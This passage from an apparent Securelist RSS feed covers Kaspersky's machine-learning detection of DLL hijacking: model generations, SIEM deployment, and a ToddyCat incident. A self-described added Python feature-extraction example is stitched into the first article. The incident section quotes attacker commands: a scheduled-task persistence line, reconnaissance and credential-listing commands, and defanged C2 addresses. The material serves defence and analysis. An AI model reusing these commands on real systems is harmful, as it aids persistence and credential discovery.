  1238. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221027/dll-hijackingEN5.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-117586" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221027/dll-hijackingEN5.png" alt="" width="1264" height="452" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221027/dll-hijackingEN5.png 1264w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221027/dll-hijackingEN5-300x107.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221027/dll-hijackingEN5-1024x366.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221027/dll-hijackingEN5-768x275.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221027/dll-hijackingEN5-979x350.png 979w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221027/dll-hijackingEN5-740x265.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221027/dll-hijackingEN5-783x280.png 783w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221027/dll-hijackingEN5-800x286.png 800w" sizes="auto, (max-width: 1264px) 100vw, 1264px" /></a></p>
  1239. <h2 id="model-evolution">Model evolution</h2>
  1240. <p>Within this project, we trained several generations of models. The primary goal of the first generation was to show that machine learning could at all be applied to detecting DLL hijacking. When training this model, we used the broadest possible interpretation of the term.</p>
  1241. <p>The model&#8217;s workflow was as simple as possible:</p>
  1242. <ol>
  1243. <li>We took a data stream and extracted a frequency description for selected sets of keys.</li>
  1244. <li>We took the same data stream from a different time period and obtained a set of features.</li>
  1245. <li>We used type 1 labeling, where events in which a legitimate process loaded a malicious library from a specified set of families were marked as DLL hijacking.</li>
  1246. <li>We trained the model on the resulting data.</li>
  1247. </ol>
  1248. <div id="attachment_117587" style="width: 654px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221117/dll-hijackingEN6.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117587" class="size-full wp-image-117587" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221117/dll-hijackingEN6.png" alt="First-generation model diagram" width="644" height="470" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221117/dll-hijackingEN6.png 644w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221117/dll-hijackingEN6-300x219.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221117/dll-hijackingEN6-480x350.png 480w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221117/dll-hijackingEN6-384x280.png 384w" sizes="auto, (max-width: 644px) 100vw, 644px" /></a><p id="caption-attachment-117587" class="wp-caption-text">First-generation model diagram</p></div>
  1249. <p>The second-generation model was trained on data that had been processed by the first-generation model and verified by analysts (labeling type 2). Consequently, the labeling was more precise than during the training of the first model. Additionally, we added more features to describe the library structure and slightly complicated the workflow for describing library loads.</p>
  1250. <div id="attachment_117588" style="width: 654px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221153/dll-hijackingEN7.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117588" class="size-full wp-image-117588" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221153/dll-hijackingEN7.png" alt="Second-generation model diagram" width="644" height="470" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221153/dll-hijackingEN7.png 644w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221153/dll-hijackingEN7-300x219.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221153/dll-hijackingEN7-480x350.png 480w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221153/dll-hijackingEN7-384x280.png 384w" sizes="auto, (max-width: 644px) 100vw, 644px" /></a><p id="caption-attachment-117588" class="wp-caption-text">Second-generation model diagram</p></div>
  1251. <p>Based on the results from this second-generation model, we were able to identify several common types of false positives. For example, the training sample included potentially unwanted applications. These can, in certain contexts, exhibit behavior similar to DLL hijacking, but they are not malicious and rarely belong to this attack type.</p>
  1252. <p>We fixed these errors in the third-generation model. First, with the help of analysts, we flagged the potentially unwanted applications in the training sample so the model would not detect them. Second, in this new version, we used an expanded labeling that included useful detections from both the first and second generations. Additionally, we expanded the feature description through one-hot encoding — a technique for converting categorical features into a binary format — for certain fields. Also, since the volume of events processed by the model increased over time, this version added normalization of all features based on the data flow size.</p>
  1253. <div id="attachment_117589" style="width: 654px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221236/dll-hijackingEN8.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117589" class="size-full wp-image-117589" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221236/dll-hijackingEN8.png" alt="Third-generation model diagram" width="644" height="470" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221236/dll-hijackingEN8.png 644w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221236/dll-hijackingEN8-300x219.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221236/dll-hijackingEN8-480x350.png 480w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221236/dll-hijackingEN8-384x280.png 384w" sizes="auto, (max-width: 644px) 100vw, 644px" /></a><p id="caption-attachment-117589" class="wp-caption-text">Third-generation model diagram</p></div>
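<p>As an added example (not the article's or Kaspersky's code), the workflow described above carried out in Python on constructed telemetry: a frequency description of selected key sets is built from a baseline stream, events from a later period are described against it, a categorical field is one-hot encoded, frequencies are normalized by the size of the data flow, and the two dependency features from the &#8220;Loading DLLs&#8221; section are derived. The field names, key sets, vocabulary and sample events are assumptions.</p>

```python
"""Feature extraction for DLL-load events, following the article's workflow:
frequency description of selected key sets from a baseline stream, features
for events from a later period, one-hot encoding, normalization by data-flow
size, and the two dependency features. Added example, not Kaspersky's code:
field names, key sets, vocabulary and sample telemetry are assumptions."""
from collections import Counter, defaultdict
from dataclasses import dataclass, field
from typing import Dict, Iterable, List, Set, Tuple

Event = Dict[str, str]

# Key sets over which frequencies are counted (assumed; the page only says
# "selected sets of keys").
KEY_SETS: Dict[str, Tuple[str, ...]] = {
    "proc": ("proc_name",),
    "dll": ("dll_name",),
    "dll_loc": ("dll_name", "dll_dir"),
    "pair": ("proc_name", "dll_name"),
}
# Categorical field that is one-hot encoded, with its vocabulary (assumed).
ONE_HOT_FIELD = "sig_status"
ONE_HOT_VALUES = ("valid", "invalid", "none")


@dataclass
class FreqDesc:
    """Frequency description of the baseline stream (step 1 of the workflow)."""
    size: int = 0  # events seen; denominator for data-flow normalization
    counts: Dict[str, Counter] = field(default_factory=lambda: {k: Counter() for k in KEY_SETS})
    dll_dirs: Dict[str, Set[str]] = field(default_factory=lambda: defaultdict(set))  # folders each DLL was loaded from
    pairs_from_proc_dir: Set[Tuple[str, str]] = field(default_factory=set)  # (proc, dll) seen loading from the process folder


def build_freq_desc(stream: Iterable[Event]) -> FreqDesc:
    desc = FreqDesc()
    for ev in stream:
        desc.size += 1
        for name, keys in KEY_SETS.items():
            desc.counts[name][tuple(ev[k] for k in keys)] += 1
        desc.dll_dirs[ev["dll_name"]].add(ev["dll_dir"])
        if ev["dll_dir"] == ev["proc_dir"]:
            desc.pairs_from_proc_dir.add((ev["proc_name"], ev["dll_name"]))
    return desc


def extract_features(ev: Event, desc: FreqDesc) -> Dict[str, float]:
    """Step 2: describe one event from a later period against the baseline."""
    feats: Dict[str, float] = {}
    # Frequency features, normalized by the size of the baseline data flow.
    for name, keys in KEY_SETS.items():
        feats[f"freq_{name}"] = desc.counts[name][tuple(ev[k] for k in keys)] / max(desc.size, 1)
    # One-hot encoding of the categorical signature-status field.
    for v in ONE_HOT_VALUES:
        feats[f"{ONE_HOT_FIELD}_{v}"] = 1.0 if ev[ONE_HOT_FIELD] == v else 0.0
    # Elementary flags that the dependencies are built from.
    pair = (ev["proc_name"], ev["dll_name"])
    dll_in_proc_dir = ev["dll_dir"] == ev["proc_dir"]
    non_standard_path = ev["dll_dir"] not in desc.dll_dirs.get(ev["dll_name"], set())
    proc_renamed = ev["proc_name"] != ev["orig_name"]  # orig_name: name from PE version info (assumed field)
    proc_name_new = desc.counts["proc"][(ev["proc_name"],)] == 0  # name appears in the stream for the first time
    feats["dll_in_proc_dir"] = float(dll_in_proc_dir)
    feats["dll_non_standard_path"] = float(non_standard_path)
    feats["proc_renamed"] = float(proc_renamed)
    feats["proc_name_new"] = float(proc_name_new)
    # Dependency 1: this process normally loads the DLL from a separate folder,
    # but here the DLL sits in the process folder.
    pair_known = desc.counts["pair"][pair] > 0
    feats["dep_dll_moved_to_proc_dir"] = float(dll_in_proc_dir and pair_known and pair not in desc.pairs_from_proc_dir)
    # Dependency 2: a renamed process whose new name is unseen loads a DLL from
    # a non-standard path; renaming alone is deliberately not flagged.
    feats["dep_renamed_new_nonstd"] = float(proc_renamed and proc_name_new and non_standard_path)
    return feats


def featurize_stream(baseline: Iterable[Event], current: Iterable[Event]) -> List[Dict[str, float]]:
    desc = build_freq_desc(baseline)
    return [extract_features(ev, desc) for ev in current]


# Constructed sample telemetry (not from the page).
SYS32, VENDOR, PUBLIC = r"c:\windows\system32", r"c:\program files\vendor", r"c:\users\public"


def _ev(proc: str, proc_dir: str, dll: str, dll_dir: str, sig: str = "valid", orig: str = "") -> Event:
    return {"proc_name": proc, "orig_name": orig or proc, "proc_dir": proc_dir,
            "dll_name": dll, "dll_dir": dll_dir, ONE_HOT_FIELD: sig}


BASELINE = ([_ev("updater.exe", VENDOR, "version.dll", SYS32)] * 3    # clean: DLL in a separate folder
            + [_ev("svchost.exe", SYS32, "rpcss.dll", SYS32)] * 2)     # clean: DLL beside the process
CURRENT = [
    _ev("updater.exe", VENDOR, "version.dll", VENDOR, sig="none"),                 # DLL moved beside the process
    _ev("svc.exe", PUBLIC, "rpcss.dll", PUBLIC, sig="none", orig="svchost.exe"),  # renamed, unseen name, odd path
    _ev("svchost.exe", SYS32, "rpcss.dll", SYS32),                                # ordinary load
]

if __name__ == "__main__":
    for ev, feats in zip(CURRENT, featurize_stream(BASELINE, CURRENT)):
        deps = [k for k, v in feats.items() if k.startswith("dep_") and v]
        print(f"{ev['proc_name']:12s} {ev['dll_name']:12s} freq_pair={feats['freq_pair']:.2f} {deps}")
```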
  1254. <h2 id="comparison-of-the-models">Comparison of the models</h2>
  1255. <p>To evaluate the evolution of our models, we applied them to a test data set none of them had worked with before. The graph below shows the ratio of true positive to false positive verdicts for each model.</p>
  1256. <div id="attachment_117590" style="width: 1639px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221323/dll-hijackingEN9.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117590" class="size-full wp-image-117590" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221323/dll-hijackingEN9.png" alt="Trends in true positives and false positives from the first-, second-, and third-generation models" width="1629" height="664" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221323/dll-hijackingEN9.png 1629w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221323/dll-hijackingEN9-300x122.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221323/dll-hijackingEN9-1024x417.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221323/dll-hijackingEN9-768x313.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221323/dll-hijackingEN9-1536x626.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221323/dll-hijackingEN9-859x350.png 859w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221323/dll-hijackingEN9-740x302.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221323/dll-hijackingEN9-687x280.png 687w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/28221323/dll-hijackingEN9-800x326.png 800w" sizes="auto, (max-width: 1629px) 100vw, 1629px" /></a><p id="caption-attachment-117590" class="wp-caption-text">Trends in true positives and false positives from the first-, second-, and third-generation models</p></div>
  1257. <p>As the models evolved, the percentage of true positives grew. While the first-generation model achieved a relatively good true positive rate (0.6 or higher) only at a very high false positive rate (10<sup>-3</sup> or more), the second-generation model reached it at 10<sup>-5</sup>. The third-generation model, at the same low false positive rate, reached a true positive rate of 0.8, which is considered a good result.</p>
  1258. <p>Evaluating the models on the data stream at a fixed score shows that the absolute number of new events labeled as DLL Hijacking increased from one generation to the next. That said, evaluating the models by their false verdict rate also helps track progress: the first model has a fairly high error rate, while the second and third generations have significantly lower ones.</p>
  1259. <div class="js-infogram-embed" data-id="_/OWgUgOWv4ByEQ85H3Kvx" data-type="interactive" data-title="03-EN-DLL Hijacking charts" style="min-height:;"></div>
  1260. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>False positives rate among model outputs, July 2024 – August 2025 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/02095204/03-en-dll-hijacking-charts-1.png" target="_blank" rel="noopener">download</a>)</em></p>
  1261. <h2 id="practical-application-of-the-models">Practical application of the models</h2>
  1262. <p>All three model generations are used in our internal systems to detect likely cases of DLL hijacking within telemetry data streams. We receive 6.5 million security events daily, linked to 800,000 unique files. Aggregates are built from this sample at a specified interval, enriched, and then fed into the models. The output data is then ranked by model and by the probability of DLL hijacking assigned to the event, and then sent to our analysts. For instance, if the third-generation model flags an event as DLL hijacking with high confidence, it should be investigated first, whereas a less definitive verdict from the first-generation model can be checked last.</p>
  1263. <p>Simultaneously, the models are tested on a separate data stream they have not seen before. This is done to assess their effectiveness over time, as a model&#8217;s detection performance can degrade. The graph below shows that the percentage of correct detections varies slightly over time, but on average, the models detect 70–80% of DLL hijacking cases.</p>
  1264. <div class="js-infogram-embed" data-id="_/x8oClVXPCh0H7k2VhVBA" data-type="interactive" data-title="04-EN-DLL Hijacking charts" style="min-height:;"></div>
  1265. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>DLL hijacking detection trends for all three models, October 2024 – September 2025 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/02095150/04-en-dll-hijacking-charts-1.png" target="_blank" rel="noopener">download</a>)</em></p>
  1266. <p>Additionally, we recently deployed a DLL hijacking detection model into the <a href="https://www.kaspersky.com/enterprise-security/unified-monitoring-and-analysis-platform?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______e9dd8a9973100725" target="_blank" rel="noopener">Kaspersky SIEM</a>, but first we tested the model in the <a href="https://www.kaspersky.com/enterprise-security/managed-detection-and-response?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team___kmdr____8449ede27504ec48" target="_blank" rel="noopener">Kaspersky MDR</a> service. During the pilot phase, the model helped to detect and prevent a number of DLL hijacking incidents in our clients&#8217; systems. We have written <a href="https://securelist.com/detecting-dll-hijacking-with-machine-learning-in-kaspersky-siem/117567/" target="_blank" rel="noopener">a separate article</a> about how the machine learning model for detecting targeted attacks involving DLL hijacking works in Kaspersky SIEM and the incidents it has identified.</p>
  1267. <h2 id="conclusion">Conclusion</h2>
  1268. <p>Based on the training and application of the three generations of models, the experiment to detect DLL hijacking using machine learning was a success. We were able to develop a model that distinguishes events resembling DLL hijacking from other events, and refined it to a state suitable for practical use, not only in our internal systems but also in commercial products. Currently, the models operate in the cloud, scanning hundreds of thousands of unique files per month and detecting thousands of files used in DLL hijacking attacks each month. They regularly identify previously unknown variations of these attacks. The results from the models are sent to analysts who verify them and create new detection rules based on their findings.</p>
  1269. ]]></content:encoded>
  1270. <wfw:commentRss>https://securelist.com/building-ml-model-to-detect-dll-hijacking/117565/feed/</wfw:commentRss>
  1271. <slash:comments>0</slash:comments>
  1272. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30133010/SL-ML-model-training-featured.jpg" width="2000" height="1000"><media:keywords>full</media:keywords></media:content>
  1273. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30133010/SL-ML-model-training-featured-1024x512.jpg" width="1024" height="512"><media:keywords>large</media:keywords></media:content>
  1274. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30133010/SL-ML-model-training-featured-300x150.jpg" width="300" height="150"><media:keywords>medium</media:keywords></media:content>
  1275. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30133010/SL-ML-model-training-featured-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  1276. </item>
  1277. <item>
  1278. <title>Detecting DLL hijacking with machine learning: real-world cases</title>
  1279. <link>https://securelist.com/detecting-dll-hijacking-with-machine-learning-in-kaspersky-siem/117567/</link>
  1280. <comments>https://securelist.com/detecting-dll-hijacking-with-machine-learning-in-kaspersky-siem/117567/#respond</comments>
  1281. <dc:creator><![CDATA[Gleb Ivanov, Andrey Gunkin]]></dc:creator>
  1282. <pubDate>Mon, 06 Oct 2025 08:00:08 +0000</pubDate>
  1283. <category><![CDATA[Security technologies]]></category>
  1284. <category><![CDATA[Security technology]]></category>
  1285. <category><![CDATA[Machine learning]]></category>
  1286. <category><![CDATA[DLL hijacking]]></category>
  1287. <category><![CDATA[Threat hunting]]></category>
  1288. <category><![CDATA[DLL sideloading]]></category>
  1289. <category><![CDATA[Cybersecurity]]></category>
  1290. <category><![CDATA[Artificial intelligence]]></category>
  1291. <category><![CDATA[DLL]]></category>
  1292. <category><![CDATA[SIEM]]></category>
  1293. <category><![CDATA[Cybersecurity]]></category>
  1294. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=117567</guid>
  1295.  
  1296. <description><![CDATA[We will tell you how we integrated a DLL Hijacking detection model into the Kaspersky SIEM platform and how it helped us uncover several incidents in their early stages.]]></description>
  1297. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30120509/SL-DLL-Hicjacking-detection-featured-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><h2 id="introduction">Introduction</h2>
  1298. <p>Our colleagues from the AI expertise center recently developed a machine-learning model that detects DLL-hijacking attacks. We then integrated this model into the <a href="https://www.kaspersky.com/enterprise-security/unified-monitoring-and-analysis-platform?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______e9dd8a9973100725" target="_blank" rel="noopener">Kaspersky Unified Monitoring and Analysis Platform</a> SIEM system. In <a href="https://securelist.com/building-ml-model-to-detect-dll-hijacking/117565/" target="_blank" rel="noopener">a separate article</a>, our colleagues shared how the model had been created and what success they had achieved in lab environments. Here, we focus on how it operates within Kaspersky SIEM, the preparation steps taken before its release, and some real-world incidents it has already helped us uncover.</p>
  1299. <h2 id="how-the-model-works-in-kaspersky-siem">How the model works in Kaspersky SIEM</h2>
  1300. <p>The model&#8217;s operation generally boils down to a step-by-step check of all DLL libraries loaded by processes in the system, followed by validation in the Kaspersky Security Network (KSN) cloud. This approach allows local attributes (path, process name, and file hashes) to be combined with a global knowledge base and behavioral indicators, which significantly improves detection quality and reduces the probability of false positives.</p>
  1301. <p>The model can run in one of two modes: on a correlator or on a collector. A correlator is a SIEM component that performs event analysis and correlation based on predefined rules or algorithms. If detection is configured on a correlator, the model checks events that have already triggered a rule. This reduces the volume of KSN queries and the model&#8217;s response time.</p>
  1302. <p>This is how it looks:</p>
  1303. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220337/detecting-dll-hijackingEN2.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-117570" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220337/detecting-dll-hijackingEN2.png" alt="" width="984" height="395" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220337/detecting-dll-hijackingEN2.png 984w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220337/detecting-dll-hijackingEN2-300x120.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220337/detecting-dll-hijackingEN2-768x308.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220337/detecting-dll-hijackingEN2-872x350.png 872w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220337/detecting-dll-hijackingEN2-740x297.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220337/detecting-dll-hijackingEN2-698x280.png 698w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220337/detecting-dll-hijackingEN2-800x321.png 800w" sizes="auto, (max-width: 984px) 100vw, 984px" /></a></p>
  1304. <p>A collector is a software or hardware component of a SIEM platform that collects and normalizes events from various sources, and then delivers these events to the platform&#8217;s core. If detection is configured on a collector, the model processes all events associated with various processes loading libraries, provided these events meet the following conditions:</p>
  1305. <ul>
  1306. <li>The path to the process file is known.</li>
  1307. <li>The path to the library is known.</li>
  1308. <li>The hashes of the file and the library are available.</li>
  1309. </ul>
  1310. <p>This method consumes more resources, and the model&#8217;s response takes longer than it does on a correlator. However, it can be useful for retrospective threat hunting because it allows you to check all events logged by Kaspersky SIEM. The model&#8217;s workflow on a collector looks like this:</p>
  1311. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220444/detecting-dll-hijackingEN4.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-117572" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220444/detecting-dll-hijackingEN4.png" alt="" width="984" height="366" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220444/detecting-dll-hijackingEN4.png 984w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220444/detecting-dll-hijackingEN4-300x112.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220444/detecting-dll-hijackingEN4-768x286.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220444/detecting-dll-hijackingEN4-941x350.png 941w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220444/detecting-dll-hijackingEN4-740x275.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220444/detecting-dll-hijackingEN4-753x280.png 753w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220444/detecting-dll-hijackingEN4-800x298.png 800w" sizes="auto, (max-width: 984px) 100vw, 984px" /></a></p>
  1312. <p>It is important to note that the model is not limited to a binary &#8220;malicious/non-malicious&#8221; assessment; it ranks its responses by confidence level. This allows it to be used as a flexible tool in SOC practice. Examples of possible verdicts:</p>
  1313. <ul>
  1314. <li>0: data is being processed.</li>
  1315. <li>1: maliciousness not confirmed. This means the model currently does not consider the library malicious.</li>
  1316. <li>2: suspicious library.</li>
  1317. <li>3: maliciousness confirmed.</li>
  1318. </ul>
  1319. <p>A Kaspersky SIEM rule for detecting DLL hijacking would look like this:</p><pre class="urvanov-syntax-highlighter-plain-tag">N.KL_AI_DLLHijackingCheckResult &gt; 1</pre><p>
  1320. Embedding the model into the Kaspersky SIEM correlator automates the process of finding DLL-hijacking attacks, making it possible to detect them at scale without having to manually analyze hundreds or thousands of loaded libraries. Furthermore, when combined with correlation rules and telemetry sources, the model can be used not just as a standalone module but as part of a comprehensive defense against infrastructure attacks.</p>
  1321. <h2 id="incidents-detected-during-the-pilot-testing-of-the-model-in-the-mdr-service">Incidents detected during the pilot testing of the model in the MDR service</h2>
  1322. <p>Before being released, the model (as part of the Kaspersky SIEM platform) was tested in the <a href="https://www.kaspersky.com/enterprise-security/managed-detection-and-response?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team___kmdr____8449ede27504ec48" target="_blank" rel="noopener">MDR</a> service, where it was trained to identify attacks on large datasets supplied by our telemetry. This step was necessary to ensure that detection works not only in lab settings but also in real client infrastructures.</p>
  1323. <p>During the pilot testing, we verified the model&#8217;s resilience to false positives and its ability to correctly classify behavior even in non-typical DLL-loading scenarios. As a result, several real-world incidents were successfully detected where attackers used one type of DLL hijacking — the DLL Sideloading technique — to gain persistence and execute their code in the system.</p>
  1324. <p>Let us take a closer look at the three most interesting of these.</p>
  1325. <h3 id="incident-1-toddycat-trying-to-launch-cobalt-strike-disguised-as-a-system-library">Incident 1. ToddyCat trying to launch Cobalt Strike disguised as a system library</h3>
  1326. <p>In one incident, the attackers successfully leveraged the vulnerability <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27076" target="_blank" rel="noopener">CVE-2021-27076</a> to exploit a SharePoint service that used IIS as a web server. They ran the following command:</p><pre class="urvanov-syntax-highlighter-plain-tag">c:\windows\system32\inetsrv\w3wp.exe -ap "SharePoint - 80" -v "v4.0" -l "webengine4.dll" -a \\.\pipe\iisipmd32ded38-e45b-423f-804d-34471928538b -h "C:\inetpub\temp\apppools\SharePoint - 80\SharePoint - 80.config" -w "" -m 0</pre><p>
  1327. After the exploitation, the IIS process created files that were later used to run malicious code via the DLL sideloading technique (<a href="https://attack.mitre.org/techniques/T1574/001/" target="_blank" rel="noopener">T1574.001 Hijack Execution Flow: DLL</a>):</p><pre class="urvanov-syntax-highlighter-plain-tag">C:\ProgramData\SystemSettings.exe
  1328. C:\ProgramData\SystemSettings.dll</pre><p>
  1329. SystemSettings.dll is the name of a library associated with the Windows Settings application (SystemSettings.exe). The original library contains code and data that the Settings application uses to manage and configure various system parameters. However, the library created by the attackers has malicious functionality and is only pretending to be a system library.</p>
  1330. <p>Later, to establish persistence in the system and launch a DLL sideloading attack, a scheduled task was created, disguised as a Microsoft Edge browser update. It launches a SystemSettings.exe file, which is located in the same directory as the malicious library:</p><pre class="urvanov-syntax-highlighter-plain-tag">Schtasks  /create  /ru "SYSTEM" /tn "\Microsoft\Windows\Edge\Edgeupdates" /sc DAILY /tr "C:\ProgramData\SystemSettings.exe" /F</pre><p>
  1331. The task is set to run daily.</p>
  1332. <p>When the SystemSettings.exe process is launched, it loads the malicious DLL. As this happened, the process and library data were sent to our model for analysis and detection of a potential attack.</p>
  1333. <div id="attachment_117573" style="width: 693px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220709/detecting-dll-hijacking3.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117573" class="size-full wp-image-117573" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220709/detecting-dll-hijacking3.png" alt="Example of a SystemSettings.dll load event with a DLL Hijacking module verdict in Kaspersky SIEM" width="683" height="1082" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220709/detecting-dll-hijacking3.png 683w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220709/detecting-dll-hijacking3-189x300.png 189w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220709/detecting-dll-hijacking3-646x1024.png 646w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220709/detecting-dll-hijacking3-221x350.png 221w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220709/detecting-dll-hijacking3-631x1000.png 631w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220709/detecting-dll-hijacking3-177x280.png 177w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220709/detecting-dll-hijacking3-568x900.png 568w" sizes="auto, (max-width: 683px) 100vw, 683px" /></a><p id="caption-attachment-117573" class="wp-caption-text">Example of a SystemSettings.dll load event with a DLL Hijacking module verdict in Kaspersky SIEM</p></div>
  1334. <p>The resulting data helped our analysts highlight a suspicious DLL and analyze it in detail. The library was found to be a <a href="https://tip.kaspersky.com/landscape/software/S0353" target="_blank" rel="noopener">Cobalt Strike</a> implant. After loading it, the SystemSettings.exe process attempted to connect to the attackers&#8217; command-and-control server.</p><pre class="urvanov-syntax-highlighter-plain-tag">DNS query: connect-microsoft[.]com
  1335. DNS query type: AAAA
  1336. DNS response: ::ffff:8.219.1[.]155;
  1337. 8.219.1[.]155:8443</pre><p>
  1338. After establishing a connection, the attackers began host reconnaissance to gather various data to develop their attack.</p><pre class="urvanov-syntax-highlighter-plain-tag">C:\ProgramData\SystemSettings.exe
  1339. whoami /priv
  1340. hostname
  1341. reg query HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid
  1342. powershell -c $psversiontable
  1343. dotnet --version
  1344. systeminfo
  1345. reg query "HKEY_LOCAL_MACHINE\SOFTWARE\VMware, Inc.\VMware Drivers"
  1346. cmdkey /list
  1347. REG query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber
